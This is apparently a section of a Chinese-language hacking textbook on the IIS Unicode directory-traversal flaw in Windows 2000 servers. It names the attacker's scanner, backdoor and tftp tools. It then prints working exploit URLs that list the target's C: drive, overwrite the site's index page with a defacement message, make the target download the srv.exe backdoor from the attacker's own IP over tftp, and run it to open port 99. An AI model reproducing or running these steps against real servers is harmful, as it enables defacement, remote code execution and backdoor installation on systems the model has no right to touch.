4.2.2 漏洞应用

4.2.2  漏洞应用

1．所需工具
流光：小榕开发的功能非常强大的扫描工具。
srv.exe：后门程序，打开目标服务器的99端口。
tftp：是让黑客的电脑变成一台服务器，让被攻击主机来下载黑客本机文件的工具。

2．查找有漏洞的服务器

“流光”在运行中会弹出一个窗口，显示目标服务器存在的漏洞。这时黑客发现有一台服务器存在Unicode漏洞，如图4-18所示。

图4-18  “流光”探测结果

3．远程改写网站首页面

如果黑客在IE的地址栏输入如下命令：

 http://*.*.*.5/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir%20c:\  

结果会显示出目标服务器C盘的所有文件和文件夹，带有<DIR>标记的是目录，如图4-19所示。

代码中的“scripts”是Windows 2000服务器默认IIS目录里的一个可执行文件夹，“../%c1%1c..解析为../..”和“winnt/system32/cmd.exe?”代表调用远程服务器的DOS，“dir%20c:\”是显示C盘根目录文件及目录，其中“%20”解析为空格。

图4-19  利用Unicode漏洞查看C盘文件

图4-20  利用Unicode漏洞查看系统环境

 http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hack+by+东方飘云+>
c:\inetpub\wwwroot\index.htm

 CGI Error
The specified CGI application misbehaved by not returning a complete
set of HTTP headers. The headers it did return are:

图4-21  修改网站首页

4．远程拿管理员权限

运行tftp.exe，这时黑客的机器已经是一个FTP服务器了。然后，黑客把要上传的文件复制到与tftp.exe相同的目录下。打开浏览器，在地址栏里键入：

http://x.x.x.x/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp -i *.*.*.1 GET srv.exe c:\\inetpub\\scripts\\srv.exe
其中，“*.*.*.1”为黑客自己的IP，“c:\\inetpub\\scripts\\”为主机服务器目录，“tftp –i”是参数，“GET”是取回命令，后面是取回的文件名。

然后等待大约2～3分钟，IE左下角显示完成。这时srv.exe已经上传到主机的c:\inetpub\scripts\目录下了，如图4-22所示。

键入“http://*.*.*.5/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+c:\inetpub\ scripts\srv.exe”来执行srv.exe，用于打开目标服务器的99端口，如图4-23所示。

图4-22  上传srv.exe文件到远程电脑

图4-23  利用Unicode漏洞执行srv.exe文件

图4-24  Telnet到远程电脑